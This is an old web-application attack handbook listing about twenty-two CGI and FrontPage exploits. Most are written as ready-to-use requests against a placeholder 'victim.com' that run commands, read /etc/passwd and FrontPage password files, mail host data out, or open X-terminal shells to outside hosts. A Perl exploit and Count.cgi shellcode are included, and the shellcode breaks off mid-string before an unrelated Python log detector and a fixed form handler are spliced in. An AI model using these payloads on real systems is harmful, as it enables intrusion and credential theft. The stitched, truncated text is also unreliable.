Web Application Attack Handbook
Author: unknown   Source: CnXHacker.Net   Updated: 2004-11-7
Article author: 无用君 [ISFOCUS]

A while ago I read 小许's "CGI Vulnerability Attack Handbook version-0.02" and felt that this kind of article is really important. But attacks on web programs are no longer limited to CGI and Perl scripts, so this time I collected some common ASP program vulnerabilities from the net and added them, renamed the piece "Web Application Attack Handbook", and fixed the incomplete Count.cgi attack section of the original "CGI Vulnerability Attack Handbook version-0.02". I hope it is useful to everyone!

1. The phf vulnerability
The phf hole is probably the most classic one; almost every article covers it. It lets you execute commands on the server, for example to display /etc/passwd:
    lynx http://www.victim.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
But can we still find it anywhere?

2. Vulnerability in php.cgi 2.0beta10 and earlier
Lets you read any file the nobody account can read.
    lynx http://www.victim.com/cgi-bin/php.cgi?/etc/passwd
php.cgi 2.1 can only read shtml files. Regarding the password file, comrades should keep in mind that it may also live in /etc/master.passwd, /etc/security/passwd, and so on.

3. whois_raw.cgi
    lynx http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
    lynx http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/ xterm%20-display%20graziella.lame.org:0

4. faxsurvey
    lynx http://www.victim.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd

5. textcounter.pl
If textcounter.pl is present on the server, anyone can execute commands with the privileges of the http daemon.
    #!/usr/bin/perl
    $URL='http://dtp.kappa.ro/a/test.shtml';# please _DO_ _modify_ this
    $EMAIL='pdoru@pop3.kappa.ro,root'; # please _DO_ _modify_ this
    if ($ARGV[0]) { $CMD=$ARGV[0];}else{ $CMD="(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)|mail $ -sanothere_one"; }
    $text="$/;IFS=8;$;echo|";
    $text =~ s/ /$/g;
    #print "$textn";
    system( "wget", $text, "-O/dev/null");
    system( "wget", $text, "-O/dev/null");
    #system( "lynx", $text); # if there is no wget command, lynx also works
    #system( "lynx", $text);

6. Vulnerability in some versions (1.1) of info2www
    $ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail jami
    $
    You have new mail.
    $
To be honest, I don't quite understand this one. :(

7. pfdispaly.cgi
    lynx -source 'http://www.victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/motd'
pfdisplay.cgi also has another hole that allows command execution:
    lynx -dump http://www.victim.com/cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|'
or
    lynx -dump http://victim/cgi-bin/pfdispaly.cgi?'%0A/usr/bin/X11/xclock%20-display%20evil:0.0|'

8. wrap
    lynx http://www.victim.com/cgi-bin/wrap?/../../../../../etc

9. www-sql
Lets you read access-restricted pages. For example, if you type http://your.server/protected/something.html into your browser you are asked for a username and password; with www-sql that is unnecessary:
    http://your.server/cgi-bin/www-sql/protected/something.html

10. view-source
    lynx http://www.victim.com/cgi-bin/view-source?../../../../../../../etc/passwd

11. campas
    lynx http://www.victim.com/cgi-bin/campas?%0acat%0a/etc/passwd%0a

12. webgais
    telnet www.victim.com 80
    POST /cgi-bin/webgais HTTP/1.0
    Content-length: 85 (replace this with the actual length of the "exploit" line)
    query=';mail+drazvan@pop3.kappa.ro

13. websendmail
    telnet www.victim.com 80
    POST /cgi-bin/websendmail HTTP/1.0
    Content-length: xxx (should be replaced with the actual length of the string passed to the server, in this case xxx=90)
    receiver=;mail+your_address@somewhere.org

14. handler
    telnet www.victim.com 80
    GET /cgi-bin/handler/useless_shit;cat /etc/passwd|?data=DownloadHTTP/1.0
or
    GET /cgi-bin/handler/blah;xwsh-displayyourhost.com|?data=Download
or
    GET /cgi-bin/handler/;xterm-displaydanish:0-e/bin/sh|?data=Download
Note that after cat comes a TAB key, not a space. The server reports that it cannot open useless_shit, but it still executes the command that follows.

15. test-cgi
    lynx http://www.victim.com/cgi-bin/test-cgi?whatever
    CGI/1.0 test script report:
    argc is 0. argv is .
    SERVER_SOFTWARE = NCSA/1.4B
    SERVER_NAME = victim.com
    GATEWAY_INTERFACE = CGI/1.1
    SERVER_PROTOCOL = HTTP/1.0
    SERVER_PORT = 80
    REQUEST_METHOD = GET
    HTTP_ACCEPT = text/plain, application/x-html, application/html, text/html, text/x-html
    PATH_INFO =
    PATH_TRANSLATED =
    SCRIPT_NAME = /cgi-bin/test-cgi
    QUERY_STRING = whatever
    REMOTE_HOST = fifth.column.gov
    REMOTE_ADDR = 200.200.200.200
    REMOTE_USER =
    AUTH_TYPE =
    CONTENT_TYPE =
    CONTENT_LENGTH =
This gives you some of the server's http directories.
    lynx http://www.victim.com/cgi-bin/test-cgi?help&0a/bin/cat%20/etc/passwd
This trick does not seem to work. :(
    lynx http://www.victim.com/cgi-bin/nph-test-cgi?/*
You can also try these:
    GET /cgi-bin/test-cgi?* HTTP/1.0
    GET /cgi-bin/test-cgi?x *
    GET /cgi-bin/nph-test-cgi?* HTTP/1.0
    GET /cgi-bin/nph-test-cgi?x *
    GET /cgi-bin/test-cgi?x HTTP/1.0 *
    GET /cgi-bin/nph-test-cgi?x HTTP/1.0 *

16. On some BSD Apache installations you can:
    lynx http://www.victim.com/root/etc/passwd
    lynx http://www.victim.com/~root/etc/passwd

17. htmlscript
    lynx http://www.victim.com/cgi-bin/htmlscript?../../../../etc/passwd

18. jj.c
The demo cgi program jj.c calls /bin/mail without filtering user input, so any program based on jj.c could potentially be exploited by simply adding a followed by a Unix command. It may require a password, but two known passwords include HTTPdrocks and SDGROCKS. If you can retrieve a copy of the compiled program, running strings on it will probably reveal the password. Do a web search on jj.c to get a copy and study the code yourself if you have more questions.

19. FrontPage extensions
If you read http://www.victim.com/_vti_inf.html you get the version of the FP extensions and their path on the server. There are also password files such as:
    http://www.victim.com/_vti_pvt/service.pwd
    http://www.victim.com/_vti_pvt/users.pwd
    http://www.victim.com/_vti_pvt/authors.pwd
    http://www.victim.com/_vti_pvt/administrators.pwd

20. Freestats.com CGI
I have not run into this one myself and felt some details must not be gotten wrong, so I am pasting the English directly.

John Carlton found the following. He developed an exploit for the free web stats services offered at freestats.com, and supplied the webmaster with proper code to patch the bug.
Start an account with freestats.com, and log in. Click on the area that says "CLICK HERE TO EDIT YOUR USER PROFILE & COUNTER INFO". This will call up a file called edit.pl with your user # and password included in it. Save this file to your hard disk and open it with notepad. The only form of security in this is a hidden attribute on the form element of your account number. Change this from *input type=hidden name=account value=your#* to *input type=text name=account value=""*. Save your page and load it into your browser. There will now be a text input box where the hidden element was before. Simply type a # in and push the "click here to update user profile" and all the information that appears on your screen has now been written to that user profile. But that isn't the worst of it. By using frames (2 frames, one to hold this page you just made, and one as a target for the form submission) you could change the password on all of their accounts with a simple javascript function. Deep inside the web site authors still have the good old "edit.pl" script.
It takes some time to reach it (unlike the path described) but you can reach it directly at:
    http://www.sitetracker.com/cgi-bin/edit.pl?account=&password=

21. Vulnerability in Glimpse HTTP
    telnet target.machine.com 80
    GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5fyodor@dhp.com HTTP/1.0

22. Count.cgi
This program only works against Count.cgi versions below 24:
    /*### count.c ########################################################*/
    #include <stdio.h>
    #include <stdlib.h>
    #include <getopt.h>
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <netinet/in.h>
    #include <netdb.h>
    #include <errno.h>
    /* Forwards */
    unsigned long getsp(int);
    int usage(char *);
    void doit(char *,long, char *);
    /* Constants */
    char shell[]=
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x
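The holes in sections 1 to 19 share a handful of shapes: a newline, semicolon or pipe smuggled into a cgi-bin parameter, "../" walking out of the web root towards /etc/passwd or /etc/motd, requests for the FrontPage _vti_pvt password files, and test-cgi environment probes. All of them leave the same traces in a web server's access log, which is what a defender can watch for. The detector below is an added example written for this page, not code from the original article; the log lines, signature names and helper names are constructed.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Common Log Format). The attack
# targets mirror patterns catalogued in the article; the first line is benign.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Nov/2004:10:00:01 +0800] "GET /index.html HTTP/1.0" 200 512
10.0.0.9 - - [07/Nov/2004:10:00:03 +0800] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 1380
10.0.0.9 - - [07/Nov/2004:10:00:04 +0800] "GET /cgi-bin/view-source?../../../../../../../etc/passwd HTTP/1.0" 200 1380
10.0.0.9 - - [07/Nov/2004:10:00:05 +0800] "GET /_vti_pvt/service.pwd HTTP/1.0" 200 96
10.0.0.9 - - [07/Nov/2004:10:00:06 +0800] "GET /cgi-bin/test-cgi?whatever HTTP/1.0" 200 730
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Signatures for the attack classes above, matched against the URL-decoded target.
SIGNATURES = [
    # newline or shell metacharacters in a cgi-bin request (phf, campas, whois_raw, handler, aglimpse)
    ("shell-metachar", re.compile(r"^/cgi-bin/.*(?:[\n\r;|`]|IFS=)", re.S)),
    # "../" climbing out of the web root (view-source, wrap, htmlscript, pfdispaly)
    ("path-traversal", re.compile(r"(?:^|[/?=])\.\./")),
    # direct reads of the system files named in the article (php.cgi, /~root on BSD Apache)
    ("sensitive-file", re.compile(r"/etc/(?:passwd|master\.passwd|security/passwd|motd)")),
    # FrontPage extension password files and the version-leaking _vti_inf.html
    ("frontpage-pwd", re.compile(r"/_vti_pvt/\w+\.pwd$|/_vti_inf\.html$", re.I)),
    # environment dump from test-cgi / nph-test-cgi
    ("test-cgi-probe", re.compile(r"^/cgi-bin/(?:nph-)?test-cgi(?:\?|$)")),
]

def decode_target(target, passes=2):
    """URL-decode repeatedly (bounded) so a double-encoded %250a is also seen."""
    for _ in range(passes):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target

def classify_target(target):
    """Names of the signatures matching one request target (path plus query)."""
    decoded = decode_target(target)
    return [name for name, pattern in SIGNATURES if pattern.search(decoded)]

def scan_log(text):
    """(client ip, raw target, matched signatures) for each suspicious log line."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and (hits := classify_target(m.group("target"))):
            alerts.append((m.group("ip"), m.group("target"), hits))
    return alerts
```

Decoding is applied before matching because the raw log line carries %0a, not a newline; the second decoding pass catches the double-encoded variant at the cost of some extra false positives on unusual but legitimate query strings.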
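The edit.pl weakness in section 20 comes down to the server taking the account to modify from a hidden form field that the client fully controls. The two handlers below are an added example, not freestats.com's or the article's code: the first reproduces that shape, the second binds the account to the server-side session and requires the current password before changing it. PROFILES, SESSIONS and the handler names are hypothetical.

```python
import hmac

# Constructed data: account number -> profile. Passwords are plaintext only to
# keep the example short; a real service would store a salted hash.
PROFILES = {"1001": {"password": "alpha", "email": "a@example.invalid"},
            "1002": {"password": "bravo", "email": "b@example.invalid"}}
# Constructed server-side session store: session cookie -> authenticated account.
SESSIONS = {"sess-1001": "1001"}

def handle_edit_weak(form):
    """edit.pl-shaped handler: the account to modify is read from the hidden
    'account' form field, so editing that field (or submitting it from a
    frame, as the report describes) rewrites any user's profile."""
    acct = form.get("account")
    if acct not in PROFILES:
        return 404
    if "email" in form:
        PROFILES[acct]["email"] = form["email"]
    if form.get("new_password"):
        PROFILES[acct]["password"] = form["new_password"]
    return 200

def handle_edit_fixed(session_cookie, form):
    """Corrected handler: the account comes from the server-side session, a
    mismatching 'account' field is refused (and is worth logging as tampering),
    and a password change must present the current password."""
    acct = SESSIONS.get(session_cookie)
    if acct is None:
        return 401
    if form.get("account") not in (None, acct):
        return 403
    profile = PROFILES[acct]
    if form.get("new_password"):
        current = form.get("current_password", "")
        if not hmac.compare_digest(current, profile["password"]):
            return 403
        profile["password"] = form["new_password"]
    if "email" in form:
        profile["email"] = form["email"]
    return 200
```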
Entered by: IceRiver   Responsible editor: IceRiver